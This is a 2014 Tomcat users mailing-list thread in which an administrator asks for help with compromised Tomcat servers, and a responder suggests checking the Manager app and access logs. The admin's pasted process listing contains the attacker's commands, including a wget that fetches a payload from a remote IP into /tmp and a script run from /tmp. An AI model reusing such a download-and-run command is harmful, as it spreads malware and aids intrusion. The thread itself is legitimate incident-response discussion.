sorry, but i forget to post /usr/java/default/bin/java -version java version "1.6.0_41" Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
Saludos.- Leonardo Santagostini <http://ar.linkedin.com/in/santagostini> 2014-04-29 17:41 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>: > Hello Dan, > > Nop, the attacker is executing locally the following > > tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh > tomcat 8893 8882 0 Apr27 ? 00:00:00 wget > http://218.199.102.59/.xy/squid32 -O /tmp/squid > > And the launch squid who tries to connect via ssh to varoius places. > > Right now its time to leave the office, but in a few hours i will paste in > pastebin access logs, config files, wherever you tell me. > > This is my pstree > > [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree > init─┬─atd > ├─atop > ├─crond > ├─dbus-daemon > ├─events/0 > ├─events/1 > ├─events/2 > ├─events/3 > ├─httpd───8*[httpd] > ├─irqbalance > ├─2*[iscsid] > ├─iscsiuio───3*[{iscsiuio}] > ├─java─┬─sh───wget > │ └─263*[{java}] > ├─khelper > > By the way, logfiles are really big, 200 mb each one, ill try to set up a > dropbox account so i can share it. > > Thanks and regards > > Saludos.- > Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dmik...@gopivotal.com>: > > On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini < >> lsantagost...@gmail.com> wrote: >> >> > Hello list, >> > >> > Im facing an issue in 6 tomcat server that are getting penetrated and >> they >> > are executing malicious scripts on my server. >> >> Can you share more about what they are doing? It might give some clues >> as to how they are accessing your machines. For example, if they are >> deploying a WAR file to your server, it could mean that they have access to >> the Manager application on your server. >> >> Any details you can share, might be helpful. >> >> > Im using 7.0.53 on my servers. Running Centos 5.8 >> > >> > Let me know what information you need. >> >> Do you have an access log? If not, enable one. If the attacker is not >> deleting it, it could show you more about who they are and what requests >> they are executing to access your server. Assuming they are entering >> through your application and not some other way. >> >> Dan >> >> > >> > PS: This is my first mail to this list, so i apologize for this not >> gentle >> > presentation. >> > >> > Saludos.- >> > Leonardo Santagostini >> > >> > <http://ar.linkedin.com/in/santagostini> >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org >> For additional commands, e-mail: users-h...@tomcat.apache.org >> >> >